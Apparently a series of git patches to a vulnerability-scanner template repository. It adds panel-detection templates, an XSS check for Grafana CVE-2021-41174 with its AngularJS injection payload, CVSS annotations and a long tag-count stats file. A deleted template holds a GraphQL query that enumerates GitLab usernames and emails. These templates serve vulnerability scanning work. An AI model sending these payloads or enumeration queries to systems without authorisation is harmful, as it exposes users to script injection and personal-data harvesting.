b/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml deleted file mode 100644 index d510556e85..0000000000 --- a/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: gitlab-graphql-user-enum - -info: - name: Gitlab User enumeration via Graphql API - author: pikpikcu - severity: info - tags: gitlab,enum,misconfig - -requests: - - method: POST - path: - - "{{BaseURL}}/api/graphql" - headers: - Content-Type: application/json - body: | - { - "query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }" - } - - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "application/json" - - - type: word - condition: and - words: - - avatarUrl - - username - - email - - - type: status - status: - - 200 From d6f082e8deb8d7c2037a89f466b102712ce51844 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 6 Nov 2021 22:38:44 +0530 Subject: [PATCH 3474/4083] Create shoutcast-server.yaml --- exposed-panels/shoutcast-server.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/shoutcast-server.yaml diff --git a/exposed-panels/shoutcast-server.yaml b/exposed-panels/shoutcast-server.yaml new file mode 100644 index 0000000000..8a165cfb61 --- /dev/null +++ b/exposed-panels/shoutcast-server.yaml @@ -0,0 +1,25 @@ +id: shoutcast-server + +info: + name: SHOUTcast Server + author: dhiyaneshDk + severity: info + tags: panel + metadata: + shodan-query: 'http.title:"SHOUTcast Server"' + +requests: + - method: GET + path: + - "{{BaseURL}}/index.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SHOUTcast Server" + + - type: status + status: + - 200 From 56c9fb7a7b2b724bbb74aa678930db156ff5685b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 17:09:47 +0000 Subject: [PATCH 3475/4083] Auto Generated CVE annotations [Sat Nov 6 17:09:47 UTC 2021] :robot: --- cves/2020/CVE-2020-26413.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-26413.yaml b/cves/2020/CVE-2020-26413.yaml index 89780ec335..abfff46eb2 100644 --- a/cves/2020/CVE-2020-26413.yaml +++ b/cves/2020/CVE-2020-26413.yaml @@ -10,6 +10,11 @@ info: - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 tags: cve,cve2020,gitlab,exposure,enum + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-26413 + cwe-id: CWE-200 requests: - raw: From 7f41fbdb5bc3bc91f0adfc708f4fe8e4dc1ea6d6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 6 Nov 2021 22:42:31 +0530 Subject: [PATCH 3476/4083] Create kerio-connect-client.yaml --- exposed-panels/kerio-connect-client.yaml | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/kerio-connect-client.yaml diff --git a/exposed-panels/kerio-connect-client.yaml b/exposed-panels/kerio-connect-client.yaml new file mode 100644 index 0000000000..0c7a6db98d --- /dev/null +++ b/exposed-panels/kerio-connect-client.yaml @@ -0,0 +1,25 @@ +id: kerio-connect-client + +info: + name: Kerio Connect Client + author: dhiyaneshDk + severity: info + tags: panel + metadata: + shodan-query: 'http.title:"Kerio Connect Client"' + +requests: + - method: GET + path: + - "{{BaseURL}}/webmail/login/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Kerio Connect Client" + + - type: status + status: + - 200 From 2beb8767ff382a39450b7ce91b9d0e6189d9469c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 7 Nov 2021 04:08:43 +0530 Subject: [PATCH 3477/4083] Added CVE-2021-41174 --- cves/2021/CVE-2021-41174.yaml | 41 +++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 cves/2021/CVE-2021-41174.yaml diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml new file mode 100644 index 0000000000..e553ac3555 --- /dev/null +++ b/cves/2021/CVE-2021-41174.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-41174 + +info: + name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS + author: pdteam + severity: medium + description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. + reference: + - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 + tags: cve,cve2021,grafana,xss + metadata: + shodan-query: title:"Grafana" + +requests: + - method: GET + path: + - "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1" + + skip-variables-check: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Grafana" + - "frontend_boot_js_done_time_seconds" + condition: and + + - type: regex + regex: + - '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))' + + extractors: + - type: regex + group: 1 + regex: + - '"subTitle":"Grafana ([a-z0-9.]+)' \ No newline at end of file From 2f7b3d7e004e21b3966a5bc0736f9e4c02b6f136 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 22:43:41 +0000 Subject: [PATCH 3478/4083] Auto Generated CVE annotations [Sat Nov 6 22:43:41 UTC 2021] :robot: --- cves/2021/CVE-2021-41174.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml index e553ac3555..241b7b0b94 100644 --- a/cves/2021/CVE-2021-41174.yaml +++ b/cves/2021/CVE-2021-41174.yaml @@ -11,6 +11,11 @@ info: tags: cve,cve2021,grafana,xss metadata: shodan-query: title:"Grafana" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-41174 + cwe-id: CWE-79 requests: - method: GET From 8cf1a26c57dfc03e9b03b49126d343f8057e9c39 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 23:13:46 +0000 Subject: [PATCH 3479/4083] Auto Generated Templates Stats [Sat Nov 6 23:13:46 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1934 +++++++++++++++++++++--------------------- TOP-10.md | 10 +- 3 files changed, 973 insertions(+), 973 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index bf7fa0b1d5..6ef7d7d0dc 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":859},{"name":"lfi","count":353},{"name":"panel","count":297},{"name":"xss","count":268},{"name":"wordpress","count":263},{"name":"exposure","count":252},{"name":"rce","count":222},{"name":"tech","count":205},{"name":"wp-plugin","count":181},{"name":"cve2021","count":168},{"name":"cve2020","count":166},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"token-spray","count":102},{"name":"cve2019","count":102},{"name":"config","count":100},{"name":"cve2018","count":94},{"name":"iot","count":81},{"name":"apache","count":75},{"name":"oast","count":75},{"name":"takeover","count":70},{"name":"default-login","count":69},{"name":"token","count":68},{"name":"file","count":57},{"name":"cve2017","count":53},{"name":"unauth","count":51},{"name":"ssrf","count":44},{"name":"network","count":44},{"name":"","count":43},{"name":"sqli","count":42},{"name":"oracle","count":40},{"name":"cve2016","count":39},{"name":"redirect","count":38},{"name":"logs","count":35},{"name":"misconfig","count":33},{"name":"google","count":30},{"name":"cve2015","count":30},{"name":"jira","count":29},{"name":"atlassian","count":29},{"name":"cisco","count":28},{"name":"cve2014","count":27},{"name":"listing","count":27},{"name":"auth-bypass","count":27},{"name":"generic","count":24},{"name":"misc","count":22},{"name":"disclosure","count":22},{"name":"router","count":22},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"cve2012","count":18},{"name":"weblogic","count":16},{"name":"cve2011","count":15},{"name":"fuzz","count":15},{"name":"devops","count":15},{"name":"wp-theme","count":15},{"name":"aws","count":15},{"name":"php","count":15},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"struts","count":14},{"name":"deserialization","count":14},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"zoho","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"xxe","count":11},{"name":"intrusive","count":11},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"rails","count":9},{"name":"vmware","count":9},{"name":"ftp","count":9},{"name":"gitlab","count":9},{"name":"ibm","count":9},{"name":"fastjson","count":9},{"name":"kubernetes","count":9},{"name":"airflow","count":8},{"name":"microsoft","count":8},{"name":"backup","count":8},{"name":"cnvd","count":8},{"name":"cve2008","count":8},{"name":"scada","count":8},{"name":"ruijie","count":8},{"name":"nginx","count":8},{"name":"camera","count":7},{"name":"django","count":7},{"name":"coldfusion","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"cms","count":7},{"name":"solr","count":7},{"name":"netgear","count":7},{"name":"sitecore","count":6},{"name":"fileupload","count":6},{"name":"lucee","count":6},{"name":"drupal","count":6},{"name":"prometheus","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"jetty","count":6},{"name":"laravel","count":6},{"name":"nodejs","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"phpmyadmin","count":6},{"name":"printer","count":5},{"name":"go","count":5},{"name":"java","count":5},{"name":"wso2","count":5},{"name":"crlf","count":5},{"name":"headless","count":5},{"name":"gocd","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"windows","count":5},{"name":"circarlife","count":5},{"name":"jolokia","count":5},{"name":"symfony","count":5},{"name":"dedecms","count":5},{"name":"thinkphp","count":5},{"name":"tomcat","count":5},{"name":"enum","count":4},{"name":"npm","count":4},{"name":"grafana","count":4},{"name":"webserver","count":4},{"name":"slack","count":4},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"git","count":4},{"name":"moodle","count":4},{"name":"zimbra","count":4},{"name":"artifactory","count":4},{"name":"maps","count":4},{"name":"keycloak","count":4},{"name":"strapi","count":4},{"name":"resin","count":4},{"name":"proxy","count":4},{"name":"traversal","count":4},{"name":"bigip","count":4},{"name":"firmware","count":4},{"name":"symantec","count":4},{"name":"thinkcmf","count":4},{"name":"vpn","count":4},{"name":"samsung","count":4},{"name":"solarwinds","count":4},{"name":"glpi","count":4},{"name":"fatpipe","count":4},{"name":"firebase","count":4},{"name":"buffalo","count":4},{"name":"asp","count":4},{"name":"exchange","count":4},{"name":"wcs","count":4},{"name":"microstrategy","count":4},{"name":"zabbix","count":4},{"name":"amazon","count":4},{"name":"magmi","count":4},{"name":"hongdian","count":4},{"name":"kevinlab","count":3},{"name":"kafka","count":3},{"name":"terramaster","count":3},{"name":"nacos","count":3},{"name":"bitrix","count":3},{"name":"cves","count":3},{"name":"node","count":3},{"name":"httpd","count":3},{"name":"cloud","count":3},{"name":"ebs","count":3},{"name":"smtp","count":3},{"name":"nexus","count":3},{"name":"cve2007","count":3},{"name":"ofbiz","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"jeesns","count":3},{"name":"tikiwiki","count":3},{"name":"caucho","count":3},{"name":"backdoor","count":3},{"name":"hoteldruid","count":3},{"name":"oa","count":3},{"name":"springcloud","count":3},{"name":"opensis","count":3},{"name":"sql","count":3},{"name":"r-seenet","count":3},{"name":"mongodb","count":3},{"name":"fanruan","count":3},{"name":"exposures","count":3},{"name":"itop","count":3},{"name":"openssh","count":3},{"name":"movable","count":3},{"name":"fpd","count":3},{"name":"lansweeper","count":3},{"name":"github","count":3},{"name":"kibana","count":3},{"name":"mail","count":3},{"name":"sonicwall","count":3},{"name":"log","count":3},{"name":"nosqli","count":3},{"name":"openam","count":3},{"name":"jellyfin","count":3},{"name":"druid","count":3},{"name":"targa","count":3},{"name":"zhiyuan","count":3},{"name":"minio","count":3},{"name":"telerik","count":3},{"name":"vbulletin","count":3},{"name":"azure","count":3},{"name":"linkerd","count":3},{"name":"cacti","count":3},{"name":"ssh","count":3},{"name":"lfr","count":3},{"name":"prestashop","count":2},{"name":"netsweeper","count":2},{"name":"idea","count":2},{"name":"idrac","count":2},{"name":"flir","count":2},{"name":"yii","count":2},{"name":"python","count":2},{"name":"leak","count":2},{"name":"middleware","count":2},{"name":"payara","count":2},{"name":"backups","count":2},{"name":"odoo","count":2},{"name":"couchdb","count":2},{"name":"aspose","count":2},{"name":"splunk","count":2},{"name":"emerge","count":2},{"name":"nextcloud","count":2},{"name":"phpstorm","count":2},{"name":"kong","count":2},{"name":"wuzhicms","count":2},{"name":"sharepoint","count":2},{"name":"aruba","count":2},{"name":"hikvision","count":2},{"name":"commax","count":2},{"name":"akamai","count":2},{"name":"trixbox","count":2},{"name":"qcubed","count":2},{"name":"vcenter","count":2},{"name":"rancher","count":2},{"name":"electron","count":2},{"name":"prtg","count":2},{"name":"hostheader-injection","count":2},{"name":"zeroshell","count":2},{"name":"hasura","count":2},{"name":"nextjs","count":2},{"name":"linux","count":2},{"name":"ucmdb","count":2},{"name":"huawei","count":2},{"name":"horde","count":2},{"name":"linkedin","count":2},{"name":"embed","count":2},{"name":"bruteforce","count":2},{"name":"voipmonitor","count":2},{"name":"frp","count":2},{"name":"plesk","count":2},{"name":"upload","count":2},{"name":"bitly","count":2},{"name":"ilo","count":2},{"name":"dos","count":2},{"name":"hpe","count":2},{"name":"chyrp","count":2},{"name":"mida","count":2},{"name":"axis2","count":2},{"name":"s3","count":2},{"name":"db","count":2},{"name":"kentico","count":2},{"name":"service","count":2},{"name":"jsf","count":2},{"name":"yapi","count":2},{"name":"heroku","count":2},{"name":"dolibarr","count":2},{"name":"vrealize","count":2},{"name":"icewarp","count":2},{"name":"spark","count":2},{"name":"spring","count":2},{"name":"shellshock","count":2},{"name":"lotus","count":2},{"name":"justwriting","count":2},{"name":"redis","count":2},{"name":"hashicorp","count":2},{"name":"glassfish","count":2},{"name":"tidb","count":2},{"name":"harbor","count":2},{"name":"nagios","count":2},{"name":"cve2005","count":2},{"name":"jeedom","count":2},{"name":"liferay","count":2},{"name":"forcepoint","count":2},{"name":"webcam","count":2},{"name":"mailchimp","count":2},{"name":"rockmongo","count":2},{"name":"globalprotect","count":2},{"name":"showdoc","count":2},{"name":"hjtcloud","count":2},{"name":"ecoa","count":2},{"name":"qihang","count":2},{"name":"rocketchat","count":2},{"name":"mcafee","count":2},{"name":"rstudio","count":2},{"name":"cache","count":2},{"name":"sonarqube","count":2},{"name":"xxljob","count":2},{"name":"geowebserver","count":2},{"name":"phpcollab","count":2},{"name":"grav","count":2},{"name":"places","count":2},{"name":"chiyu","count":2},{"name":"openfire","count":2},{"name":"maian","count":2},{"name":"openemr","count":2},{"name":"waf","count":2},{"name":"akkadian","count":2},{"name":"aviatrix","count":2},{"name":"natshell","count":2},{"name":"bucket","count":2},{"name":"saltstack","count":2},{"name":"myfactory","count":2},{"name":"ec2","count":2},{"name":"chamilo","count":2},{"name":"axis","count":2},{"name":"jetbrains","count":2},{"name":"netis","count":2},{"name":"storage","count":2},{"name":"activemq","count":2},{"name":"wordfence","count":2},{"name":"text","count":2},{"name":"igs","count":2},{"name":"seeyon","count":2},{"name":"fortios","count":2},{"name":"ruby","count":2},{"name":"status","count":2},{"name":"totemomail","count":2},{"name":"smb","count":2},{"name":"adminer","count":2},{"name":"pega","count":2},{"name":"jboss","count":2},{"name":"ecology","count":2},{"name":"avantfax","count":2},{"name":"fortinet","count":2},{"name":"oauth","count":2},{"name":"paloalto","count":2},{"name":"guacamole","count":2},{"name":"getsimple","count":2},{"name":"favicon","count":2},{"name":"openvpn","count":2},{"name":"bypass","count":2},{"name":"elasticsearch","count":1},{"name":"websphere","count":1},{"name":"avalanche","count":1},{"name":"csrfguard","count":1},{"name":"jfrog","count":1},{"name":"netmask","count":1},{"name":"spectracom","count":1},{"name":"hiboss","count":1},{"name":"sourcebans","count":1},{"name":"nordex","count":1},{"name":"memcached","count":1},{"name":"omi","count":1},{"name":"spidercontrol","count":1},{"name":"package","count":1},{"name":"mapbox","count":1},{"name":"sonarcloud","count":1},{"name":"nc2","count":1},{"name":"gloo","count":1},{"name":"plugin","count":1},{"name":"distance","count":1},{"name":"tensorflow","count":1},{"name":"pgadmin","count":1},{"name":"wix","count":1},{"name":"particle","count":1},{"name":"alibaba","count":1},{"name":"hiawatha","count":1},{"name":"zyxel","count":1},{"name":"vsftpd","count":1},{"name":"wamp","count":1},{"name":"openrestry","count":1},{"name":"resourcespace","count":1},{"name":"phpunit","count":1},{"name":"froxlor","count":1},{"name":"cve2006","count":1},{"name":"wiki","count":1},{"name":"billquick","count":1},{"name":"octoprint","count":1},{"name":"websvn","count":1},{"name":"rdp","count":1},{"name":"calendarix","count":1},{"name":"openweather","count":1},{"name":"lanproxy","count":1},{"name":"ewebs","count":1},{"name":"binance","count":1},{"name":"spotify","count":1},{"name":"fcm","count":1},{"name":"basic-auth","count":1},{"name":"phpfusion","count":1},{"name":"biometrics","count":1},{"name":"dotnet","count":1},{"name":"jitsi","count":1},{"name":"wavemaker","count":1},{"name":"geddy","count":1},{"name":"tika","count":1},{"name":"ems","count":1},{"name":"tor","count":1},{"name":"svn","count":1},{"name":"beanstalk","count":1},{"name":"nimble","count":1},{"name":"dom","count":1},{"name":"ilo4","count":1},{"name":"metabase","count":1},{"name":"linksys","count":1},{"name":"graphite","count":1},{"name":"pentaho","count":1},{"name":"aura","count":1},{"name":"mongo","count":1},{"name":"magicflow","count":1},{"name":"tinypng","count":1},{"name":"limit","count":1},{"name":"ognl","count":1},{"name":"exacqvision","count":1},{"name":"zarafa","count":1},{"name":"owa","count":1},{"name":"artica","count":1},{"name":"cobub","count":1},{"name":"thedogapi","count":1},{"name":"timeclock","count":1},{"name":"tieline","count":1},{"name":"ghost","count":1},{"name":"accela","count":1},{"name":"okta","count":1},{"name":"socomec","count":1},{"name":"webmin","count":1},{"name":"phpfastcache","count":1},{"name":"motorola","count":1},{"name":"seacms","count":1},{"name":"jsp","count":1},{"name":"clink-office","count":1},{"name":"gilacms","count":1},{"name":"comodo","count":1},{"name":"etouch","count":1},{"name":"fortilogger","count":1},{"name":"floc","count":1},{"name":"netrc","count":1},{"name":"gateone","count":1},{"name":"jumpcloud","count":1},{"name":"javafaces","count":1},{"name":"blind","count":1},{"name":"smi","count":1},{"name":"cves2001","count":1},{"name":"catfishcms","count":1},{"name":"apiman","count":1},{"name":"strava","count":1},{"name":"zms","count":1},{"name":"stem","count":1},{"name":"iceflow","count":1},{"name":"exponentcms","count":1},{"name":"mongoshake","count":1},{"name":"graphql","count":1},{"name":"nuxeo","count":1},{"name":"placeos","count":1},{"name":"nearby","count":1},{"name":"dvr","count":1},{"name":"jabber","count":1},{"name":"imap","count":1},{"name":"lighttpd","count":1},{"name":"speed","count":1},{"name":"rubedo","count":1},{"name":"youtube","count":1},{"name":"flink","count":1},{"name":"wavlink","count":1},{"name":"pippoint","count":1},{"name":"circleci","count":1},{"name":"bazarr","count":1},{"name":"darkstat","count":1},{"name":"webmodule-ee","count":1},{"name":"xml","count":1},{"name":"nette","count":1},{"name":"sprintful","count":1},{"name":"playable","count":1},{"name":"checkpoint","count":1},{"name":"discord","count":1},{"name":"expose","count":1},{"name":"cse","count":1},{"name":"mediumish","count":1},{"name":"moinmoin","count":1},{"name":"qdpm","count":1},{"name":"szhe","count":1},{"name":"expn","count":1},{"name":"k8","count":1},{"name":"salesforce","count":1},{"name":"azkaban","count":1},{"name":"visionhub","count":1},{"name":"yzmcms","count":1},{"name":"stripe","count":1},{"name":"sage","count":1},{"name":"cloudflare","count":1},{"name":"lokalise","count":1},{"name":"synnefo","count":1},{"name":"blackboard","count":1},{"name":"kyan","count":1},{"name":"wmt","count":1},{"name":"newrelic","count":1},{"name":"werkzeug","count":1},{"name":"zzzcms","count":1},{"name":"csod","count":1},{"name":"wakatime","count":1},{"name":"sendgrid","count":1},{"name":"pagespeed","count":1},{"name":"shopxo","count":1},{"name":"ssl","count":1},{"name":"jmx","count":1},{"name":"dreamweaver","count":1},{"name":"pmb","count":1},{"name":"dropbox","count":1},{"name":"beanshell","count":1},{"name":"plone","count":1},{"name":"tongda","count":1},{"name":"fortiweb","count":1},{"name":"myucms","count":1},{"name":"yachtcontrol","count":1},{"name":"webex","count":1},{"name":"scs","count":1},{"name":"mdb","count":1},{"name":"cofax","count":1},{"name":"redwood","count":1},{"name":"ruckus","count":1},{"name":"wing-ftp","count":1},{"name":"timezone","count":1},{"name":"deviantart","count":1},{"name":"tectuus","count":1},{"name":"commscope","count":1},{"name":"scimono","count":1},{"name":"wp","count":1},{"name":"spip","count":1},{"name":"appweb","count":1},{"name":"processmaker","count":1},{"name":"74cms","count":1},{"name":"ipstack","count":1},{"name":"xunchi","count":1},{"name":"embedthis","count":1},{"name":"huijietong","count":1},{"name":"hubspot","count":1},{"name":"panasonic","count":1},{"name":"cve202","count":1},{"name":"javascript","count":1},{"name":"blue-ocean","count":1},{"name":"optiLink","count":1},{"name":"bing","count":1},{"name":"gunicorn","count":1},{"name":"announcekit","count":1},{"name":"plastic","count":1},{"name":"aniapi","count":1},{"name":"gstorage","count":1},{"name":"chevereto","count":1},{"name":"umbraco","count":1},{"name":"api-manager","count":1},{"name":"graylog","count":1},{"name":"minimouse","count":1},{"name":"bullwark","count":1},{"name":"webadmin","count":1},{"name":"abuseipdb","count":1},{"name":"portainer","count":1},{"name":"adiscon","count":1},{"name":"setup","count":1},{"name":"cvnd","count":1},{"name":"digitalocean","count":1},{"name":"tjws","count":1},{"name":"empirecms","count":1},{"name":"etherscan","count":1},{"name":"clave","count":1},{"name":"influxdb","count":1},{"name":"elfinder","count":1},{"name":"qsan","count":1},{"name":"etherpad","count":1},{"name":"streetview","count":1},{"name":"piluscart","count":1},{"name":"leanix","count":1},{"name":"messaging","count":1},{"name":"aspnuke","count":1},{"name":"hadoop","count":1},{"name":"openerp","count":1},{"name":"vscode","count":1},{"name":"mantis","count":1},{"name":"nedi","count":1},{"name":"openstack","count":1},{"name":"netgenie","count":1},{"name":"manager","count":1},{"name":"actuator","count":1},{"name":"gridx","count":1},{"name":"glowroot","count":1},{"name":"flexbe","count":1},{"name":"thinkadmin","count":1},{"name":"twitter-server","count":1},{"name":"upnp","count":1},{"name":"phpwiki","count":1},{"name":"centreon","count":1},{"name":"feifeicms","count":1},{"name":"terraform","count":1},{"name":"jquery","count":1},{"name":"landrayoa","count":1},{"name":"phpshowtime","count":1},{"name":"jaspersoft","count":1},{"name":"kindeditor","count":1},{"name":"dompdf","count":1},{"name":"planon","count":1},{"name":"diris","count":1},{"name":"rmc","count":1},{"name":"labtech","count":1},{"name":"mantisbt","count":1},{"name":"clockwork","count":1},{"name":"duomicms","count":1},{"name":"listserv","count":1},{"name":"paypal","count":1},{"name":"cerebro","count":1},{"name":"grails","count":1},{"name":"traefik","count":1},{"name":"gsoap","count":1},{"name":"myanimelist","count":1},{"name":"axiom","count":1},{"name":"calendly","count":1},{"name":"cockpit","count":1},{"name":"tileserver","count":1},{"name":"episerver","count":1},{"name":"expressjs","count":1},{"name":"opensmtpd","count":1},{"name":"woocomernce","count":1},{"name":"csrf","count":1},{"name":"esmtp","count":1},{"name":"tenda","count":1},{"name":"virustotal","count":1},{"name":"pcoip","count":1},{"name":"opensns","count":1},{"name":"iconfinder","count":1},{"name":"powercreator","count":1},{"name":"pacsone","count":1},{"name":"saltapi","count":1},{"name":"acontent","count":1},{"name":"nexusdb","count":1},{"name":"concrete","count":1},{"name":"mobileiron","count":1},{"name":"acme","count":1},{"name":"thecatapi","count":1},{"name":"dwsync","count":1},{"name":"st","count":1},{"name":"mkdocs","count":1},{"name":"myvuehelp","count":1},{"name":"elascticsearch","count":1},{"name":"nownodes","count":1},{"name":"weiphp","count":1},{"name":"spf","count":1},{"name":"rmi","count":1},{"name":"asus","count":1},{"name":"bigbluebutton","count":1},{"name":"ssltls","count":1},{"name":"elevation","count":1},{"name":"nomad","count":1},{"name":"smartsense","count":1},{"name":"octobercms","count":1},{"name":" default-login","count":1},{"name":"wazuh","count":1},{"name":"pendo","count":1},{"name":"pihole","count":1},{"name":"tugboat","count":1},{"name":"landray","count":1},{"name":"travis","count":1},{"name":"maccmsv10","count":1},{"name":"skywalking","count":1},{"name":"roads","count":1},{"name":"bolt","count":1},{"name":"woocommerce","count":1},{"name":"erp-nc","count":1},{"name":"redhat","count":1},{"name":"circontrol","count":1},{"name":"eyelock","count":1},{"name":"ueditor","count":1},{"name":"anchorcms","count":1},{"name":"buildkite","count":1},{"name":"oneblog","count":1},{"name":"remkon","count":1},{"name":"moin","count":1},{"name":"smartblog","count":1},{"name":"lancom","count":1},{"name":"webui","count":1},{"name":"discourse","count":1},{"name":"weglot","count":1},{"name":"okiko","count":1},{"name":"dbeaver","count":1},{"name":"extractor","count":1},{"name":"cyberoam","count":1},{"name":"razor","count":1},{"name":"opentsdb","count":1},{"name":"database","count":1},{"name":"acexy","count":1},{"name":"raspap","count":1},{"name":"iptime","count":1},{"name":"rijksmuseum","count":1},{"name":"appveyor","count":1},{"name":"tamronos","count":1},{"name":"xmlchart","count":1},{"name":"ricoh","count":1},{"name":"dvwa","count":1},{"name":"couchbase","count":1},{"name":"dotnetnuke","count":1},{"name":"triconsole","count":1},{"name":"fontawesome","count":1},{"name":"fiori","count":1},{"name":"phalcon","count":1},{"name":"alerta","count":1},{"name":"luftguitar","count":1},{"name":"emc","count":1},{"name":"olivetti","count":1},{"name":"vsphere","count":1},{"name":"dnssec","count":1},{"name":"simplecrm","count":1},{"name":"covalent","count":1},{"name":"perl","count":1},{"name":"ganglia","count":1},{"name":"lutron","count":1},{"name":"dahua","count":1},{"name":"javamelody","count":1},{"name":"glances","count":1},{"name":"cloudron","count":1},{"name":"cocoon","count":1},{"name":"lotuscms","count":1},{"name":"phpinfo","count":1},{"name":"varnish","count":1},{"name":"mara","count":1},{"name":"solman","count":1},{"name":"taiga","count":1},{"name":"xmpp","count":1},{"name":"finereport","count":1},{"name":"nifi","count":1},{"name":"camunda","count":1},{"name":"contentkeeper","count":1},{"name":"jenkin","count":1},{"name":"gitea","count":1},{"name":"cliniccases","count":1},{"name":"rabbitmq","count":1},{"name":"optimizely","count":1},{"name":"sureline","count":1},{"name":"sarg","count":1},{"name":"viewlinc","count":1},{"name":"sophos","count":1},{"name":"mod-proxy","count":1},{"name":"pagerduty","count":1},{"name":"dbt","count":1},{"name":"default","count":1},{"name":"codeigniter","count":1},{"name":"sterling","count":1},{"name":"dribbble","count":1},{"name":"selea","count":1},{"name":"panos","count":1},{"name":"uwsgi","count":1},{"name":"auth","count":1},{"name":"tensorboard","count":1},{"name":"sast","count":1},{"name":"zm","count":1},{"name":"natemail","count":1},{"name":"zenario","count":1},{"name":"key","count":1},{"name":"cloudinary","count":1},{"name":"zookeeper","count":1},{"name":"whm","count":1},{"name":"syslog","count":1},{"name":"route","count":1},{"name":"lg-nas","count":1},{"name":"gurock","count":1},{"name":"domxss","count":1},{"name":"directions","count":1},{"name":"ulterius","count":1},{"name":"goahead","count":1},{"name":"matrix","count":1},{"name":"solarlog","count":1},{"name":"details","count":1},{"name":"adb","count":1},{"name":"netdata","count":1},{"name":"mpsec","count":1},{"name":"cscart","count":1},{"name":"buttercms","count":1},{"name":"fastapi","count":1},{"name":"webftp","count":1},{"name":"cgi","count":1},{"name":"visualtools","count":1},{"name":"kubeflow","count":1},{"name":"dotclear","count":1},{"name":"vidyo","count":1},{"name":"bedita","count":1},{"name":"onelogin","count":1},{"name":"drone","count":1},{"name":"jeewms","count":1},{"name":"asana","count":1},{"name":"weather","count":1},{"name":"zte","count":1},{"name":"plc","count":1},{"name":"autocomplete","count":1},{"name":"swagger","count":1},{"name":"eyou","count":1},{"name":"photo","count":1},{"name":"primetek","count":1},{"name":"facebook","count":1},{"name":"xvr","count":1},{"name":"faraday","count":1},{"name":"shoretel","count":1},{"name":"panabit","count":1},{"name":"sar2html","count":1},{"name":"postmessage","count":1},{"name":"daybyday","count":1},{"name":"maxsite","count":1},{"name":"micro-user-service","count":1},{"name":"robomongo","count":1},{"name":"sgp","count":1},{"name":"openx","count":1},{"name":"pyramid","count":1},{"name":"fedora","count":1},{"name":"nps","count":1},{"name":"soar","count":1},{"name":"sentry","count":1},{"name":"arl","count":1},{"name":"intercom","count":1},{"name":"loganalyzer","count":1},{"name":"centos","count":1},{"name":"opencast","count":1},{"name":"wifisky","count":1},{"name":"adafruit","count":1},{"name":"parentlink","count":1},{"name":"fortigates","count":1},{"name":"oscommerce","count":1},{"name":"geutebruck","count":1},{"name":"h3c-imc","count":1},{"name":"bash","count":1},{"name":"mrtg","count":1},{"name":"office365","count":1},{"name":"keenetic","count":1},{"name":"cooperhewitt","count":1},{"name":"mariadb","count":1},{"name":"subrion","count":1},{"name":"tpshop","count":1},{"name":"loqate","count":1},{"name":"redmine","count":1},{"name":"xiuno","count":1},{"name":"iucn","count":1},{"name":"zmanda","count":1},{"name":"circle","count":1},{"name":"secmail","count":1},{"name":"fastcgi","count":1},{"name":"sqlite","count":1},{"name":"wooyun","count":1},{"name":"idemia","count":1},{"n